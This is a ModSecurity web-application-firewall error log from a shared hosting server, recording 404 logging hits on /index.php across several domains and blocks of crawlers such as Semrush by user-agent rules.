[Tue May 26 15:29:38.548044 2026] [security2:error] [pid 715645:tid 715871] [client 74.7.230.33:59948] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "svijaykumar.in"] [uri "/cgi-sys/404.html"] [unique_id "ahVvCnVGgMGh8k213RgCCgAAYEc"]
[Tue May 26 15:29:38.736835 2026] [security2:error] [pid 715645:tid 715817] [remote 35.94.96.83:41224] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.jhonweb.com"] [uri "/index.php"] [unique_id "ahVvCHVGgMGh8k213RgB0gAAe1Y"]
[Tue May 26 15:29:39.708198 2026] [security2:error] [pid 715645:tid 715827] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVvC3VGgMGh8k213RgCHQAAADQ"]
[Tue May 26 15:29:39.739799 2026] [security2:error] [pid 715645:tid 715789] [client 91.230.225.116:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVvC3VGgMGh8k213RgCLQAAAA4"]
[Tue May 26 15:29:40.014026 2026] [security2:error] [pid 715645:tid 715882] [client 91.230.225.116:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVvC3VGgMGh8k213RgCPAAAAGs"]
[Tue May 26 15:29:40.476611 2026] [security2:error] [pid 715645:tid 715792] [client 91.230.225.116:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVvDHVGgMGh8k213RgCSAAAABE"]
[Tue May 26 15:29:40.789447 2026] [security2:error] [pid 715645:tid 715785] [client 91.230.225.116:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVvDHVGgMGh8k213RgCXAAAAAo"]
[Tue May 26 15:29:41.141451 2026] [security2:error] [pid 715645:tid 715796] [client 91.230.225.116:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVvDXVGgMGh8k213RgCaAAAABU"]
[Tue May 26 15:29:41.305194 2026] [security2:error] [pid 715645:tid 715896] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVvDXVGgMGh8k213RgCbgAAeU8"], referer: https://ndequipments.com/contact-us/
[Tue May 26 15:29:41.319934 2026] [security2:error] [pid 715645:tid 715794] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVvDXVGgMGh8k213RgCbwAAE3w"], referer: https://ndequipments.com/contact-us/
[Tue May 26 15:29:41.456804 2026] [security2:error] [pid 715645:tid 715840] [client 91.230.225.116:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVvDXVGgMGh8k213RgCeAAAAEE"]
[Tue May 26 15:29:41.779640 2026] [security2:error] [pid 715645:tid 715807] [client 91.230.225.116:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVvDXVGgMGh8k213RgChAAAACA"]
[Tue May 26 15:29:42.117300 2026] [security2:error] [pid 715645:tid 715872] [client 91.230.225.116:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVvDnVGgMGh8k213RgCjwAAAGE"]
[Tue May 26 15:29:42.168596 2026] [security2:error] [pid 715645:tid 715804] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVvDXVGgMGh8k213RgCiAAAAB0"]
[Tue May 26 15:29:42.398654 2026] [security2:error] [pid 715645:tid 715826] [client 91.230.225.116:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVvDnVGgMGh8k213RgCnwAAADM"]
[Tue May 26 15:29:42.697217 2026] [security2:error] [pid 715645:tid 715878] [client 91.230.225.116:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVvDnVGgMGh8k213RgCpwAAAGc"]
[Tue May 26 15:29:43.012962 2026] [security2:error] [pid 715645:tid 715868] [client 91.230.225.116:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVvDnVGgMGh8k213RgCsAAAAF0"]
[Tue May 26 15:29:43.281855 2026] [security2:error] [pid 715645:tid 715795] [client 91.230.225.116:39809] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVvD3VGgMGh8k213RgCvAAAABQ"]
[Tue May 26 15:29:43.806363 2026] [security2:error] [pid 715645:tid 715880] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVvD3VGgMGh8k213RgCwgAAAGk"]
[Tue May 26 15:29:44.140032 2026] [security2:error] [pid 715645:tid 715891] [client 91.230.225.116:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVvEHVGgMGh8k213RgC0gAAAHQ"]
[Tue May 26 15:29:44.431990 2026] [security2:error] [pid 715645:tid 715779] [client 91.230.225.116:39809] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVvEHVGgMGh8k213RgC2wAAAAQ"]
[Tue May 26 15:29:44.695823 2026] [security2:error] [pid 715645:tid 715864] [client 91.230.225.116:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVvEHVGgMGh8k213RgC4QAAAFk"]
[Tue May 26 15:29:44.980360 2026] [security2:error] [pid 715645:tid 715868] [client 91.230.225.116:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVvEHVGgMGh8k213RgC7QAAAF0"]
[Tue May 26 15:29:45.274534 2026] [security2:error] [pid 715645:tid 715871] [client 91.230.225.116:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVvEXVGgMGh8k213RgC8QAAAGA"]
[Tue May 26 15:29:45.683914 2026] [security2:error] [pid 715645:tid 715844] [client 91.230.225.116:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVvEXVGgMGh8k213RgDAQAAAEU"]
[Tue May 26 15:29:46.019615 2026] [security2:error] [pid 715645:tid 715787] [client 91.230.225.116:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVvEXVGgMGh8k213RgDCgAAAAw"]
[Tue May 26 15:29:46.318700 2026] [security2:error] [pid 715645:tid 715814] [client 91.230.225.116:39809] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVvEnVGgMGh8k213RgDFAAAACc"]
[Tue May 26 15:29:46.546777 2026] [security2:error] [pid 715645:tid 715793] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVvEnVGgMGh8k213RgDEgAAABI"]
[Tue May 26 15:29:46.624193 2026] [security2:error] [pid 715645:tid 715878] [client 91.230.225.116:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVvEnVGgMGh8k213RgDIQAAAGc"]
[Tue May 26 15:29:46.930948 2026] [security2:error] [pid 715645:tid 715782] [client 91.230.225.116:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVvEnVGgMGh8k213RgDKwAAAAc"]
[Tue May 26 15:29:47.232870 2026] [security2:error] [pid 715645:tid 715854] [client 91.230.225.116:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVvE3VGgMGh8k213RgDOQAAAE8"]
[Tue May 26 15:29:47.511852 2026] [security2:error] [pid 715645:tid 715812] [client 91.230.225.116:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVvE3VGgMGh8k213RgDQwAAACU"]
[Tue May 26 15:29:47.578055 2026] [security2:error] [pid 715645:tid 715886] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVvE3VGgMGh8k213RgDSgAAbz0"], referer: https://ndequipments.com/
[Tue May 26 15:29:47.581774 2026] [security2:error] [pid 715645:tid 715858] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVvE3VGgMGh8k213RgDSQAAU3o"], referer: https://ndequipments.com/
[Tue May 26 15:29:47.582508 2026] [security2:error] [pid 715645:tid 715883] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVvE3VGgMGh8k213RgDVQAAbF4"], referer: https://ndequipments.com/
[Tue May 26 15:29:47.585758 2026] [security2:error] [pid 715645:tid 715870] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVvE3VGgMGh8k213RgDRwAAX38"], referer: https://ndequipments.com/
[Tue May 26 15:29:47.586263 2026] [security2:error] [pid 715645:tid 715787] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVvE3VGgMGh8k213RgDTAAADHY"], referer: https://ndequipments.com/
[Tue May 26 15:29:47.588427 2026] [security2:error] [pid 715645:tid 715853] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVvE3VGgMGh8k213RgDSwAATkQ"], referer: https://ndequipments.com/
[Tue May 26 15:29:47.591077 2026] [security2:error] [pid 715645:tid 715708] [remote 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVvE3VGgMGh8k213RgDUgAAez4"], referer: https://ndequipments.com/
[Tue May 26 15:29:47.591612 2026] [security2:error] [pid 715645:tid 715846] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVvE3VGgMGh8k213RgDUAAAR2I"], referer: https://ndequipments.com/
[Tue May 26 15:29:47.593277 2026] [security2:error] [pid 715645:tid 715801] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVvE3VGgMGh8k213RgDVAAAGn0"], referer: https://ndequipments.com/
[Tue May 26 15:29:47.594106 2026] [security2:error] [pid 715645:tid 715831] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVvE3VGgMGh8k213RgDUQAAOAE"], referer: https://ndequipments.com/
[Tue May 26 15:29:47.602197 2026] [security2:error] [pid 715645:tid 715791] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVvE3VGgMGh8k213RgDSAAAED8"], referer: https://ndequipments.com/
[Tue May 26 15:29:47.604106 2026] [security2:error] [pid 715645:tid 715783] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVvE3VGgMGh8k213RgDUwAACAM"], referer: https://ndequipments.com/
[Tue May 26 15:29:47.605833 2026] [security2:error] [pid 715645:tid 715780] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVvE3VGgMGh8k213RgDVgAABXc"], referer: https://ndequipments.com/
[Tue May 26 15:29:47.609502 2026] [security2:error] [pid 715645:tid 715805] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVvE3VGgMGh8k213RgDTQAAHhg"], referer: https://ndequipments.com/
[Tue May 26 15:29:47.609852 2026] [security2:error] [pid 715645:tid 715866] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVvE3VGgMGh8k213RgDTgAAW1I"], referer: https://ndequipments.com/
[Tue May 26 15:29:47.620355 2026] [security2:error] [pid 715645:tid 715877] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVvE3VGgMGh8k213RgDTwAAZmg"], referer: https://ndequipments.com/
[Tue May 26 15:29:47.621597 2026] [security2:error] [pid 715645:tid 715832] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVvE3VGgMGh8k213RgDXgAAORQ"], referer: https://ndequipments.com/
[Tue May 26 15:29:47.628145 2026] [security2:error] [pid 715645:tid 715789] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVvE3VGgMGh8k213RgDVwAADlU"], referer: https://ndequipments.com/
[Tue May 26 15:29:47.628796 2026] [security2:error] [pid 715645:tid 715850] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVvE3VGgMGh8k213RgDYAAASxY"], referer: https://ndequipments.com/
[Tue May 26 15:29:47.629906 2026] [security2:error] [pid 715645:tid 715815] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVvE3VGgMGh8k213RgDWQAAKGo"], referer: https://ndequipments.com/
[Tue May 26 15:29:47.630587 2026] [security2:error] [pid 715645:tid 715887] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVvE3VGgMGh8k213RgDWgAAcGk"], referer: https://ndequipments.com/
[Tue May 26 15:29:47.631778 2026] [security2:error] [pid 715645:tid 715837] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVvE3VGgMGh8k213RgDWwAAPnA"], referer: https://ndequipments.com/
[Tue May 26 15:29:47.635140 2026] [security2:error] [pid 715645:tid 715696] [remote 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVvE3VGgMGh8k213RgDWAAAfzI"], referer: https://ndequipments.com/
[Tue May 26 15:29:47.639705 2026] [security2:error] [pid 715645:tid 715814] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVvE3VGgMGh8k213RgDXAAAJ28"], referer: https://ndequipments.com/
[Tue May 26 15:29:47.641321 2026] [security2:error] [pid 715645:tid 715796] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVvE3VGgMGh8k213RgDXwAAFXM"], referer: https://ndequipments.com/
[Tue May 26 15:29:47.646465 2026] [security2:error] [pid 715645:tid 715895] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVvE3VGgMGh8k213RgDYQAAeAg"], referer: https://ndequipments.com/
[Tue May 26 15:29:47.646672 2026] [security2:error] [pid 715645:tid 715818] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVvE3VGgMGh8k213RgDXQAAK0E"], referer: https://ndequipments.com/
[Tue May 26 15:29:47.745935 2026] [security2:error] [pid 715645:tid 715900] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVvE3VGgMGh8k213RgDaQAAfVw"], referer: https://ndequipments.com/
[Tue May 26 15:29:47.746887 2026] [security2:error] [pid 715645:tid 715876] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVvE3VGgMGh8k213RgDaAAAZXI"], referer: https://ndequipments.com/
[Tue May 26 15:29:47.763748 2026] [security2:error] [pid 715645:tid 715892] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVvE3VGgMGh8k213RgDagAAdRk"], referer: https://ndequipments.com/
[Tue May 26 15:29:47.783630 2026] [security2:error] [pid 715645:tid 715826] [client 91.230.225.116:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVvE3VGgMGh8k213RgDZwAAADM"]
[Tue May 26 15:29:48.181189 2026] [security2:error] [pid 715645:tid 715810] [client 91.230.225.116:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVvFHVGgMGh8k213RgDfQAAACM"]
[Tue May 26 15:29:48.260041 2026] [security2:error] [pid 715645:tid 715833] [client 185.191.171.3:16388] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/category/upcoming-events/page/2/"] [unique_id "ahVvFHVGgMGh8k213RgDgQAAADo"]
[Tue May 26 15:29:48.260212 2026] [security2:error] [pid 715645:tid 715833] [client 185.191.171.3:16388] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/category/upcoming-events/page/2/"] [unique_id "ahVvFHVGgMGh8k213RgDgQAAADo"]
[Tue May 26 15:29:48.284044 2026] [security2:error] [pid 715645:tid 715859] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVvE3VGgMGh8k213RgDcQAAAFQ"]
[Tue May 26 15:29:48.464476 2026] [security2:error] [pid 715645:tid 715901] [client 91.230.225.116:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVvFHVGgMGh8k213RgDhwAAAH4"]
[Tue May 26 15:29:48.713108 2026] [security2:error] [pid 715645:tid 715896] [client 91.230.225.116:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVvFHVGgMGh8k213RgDkAAAAHk"]
[Tue May 26 15:29:48.997111 2026] [security2:error] [pid 715645:tid 715902] [client 91.230.225.116:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVvFHVGgMGh8k213RgDmgAAAH8"]
[Tue May 26 15:29:49.303615 2026] [security2:error] [pid 715645:tid 715838] [client 91.230.225.116:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVvFXVGgMGh8k213RgDqQAAAD8"]
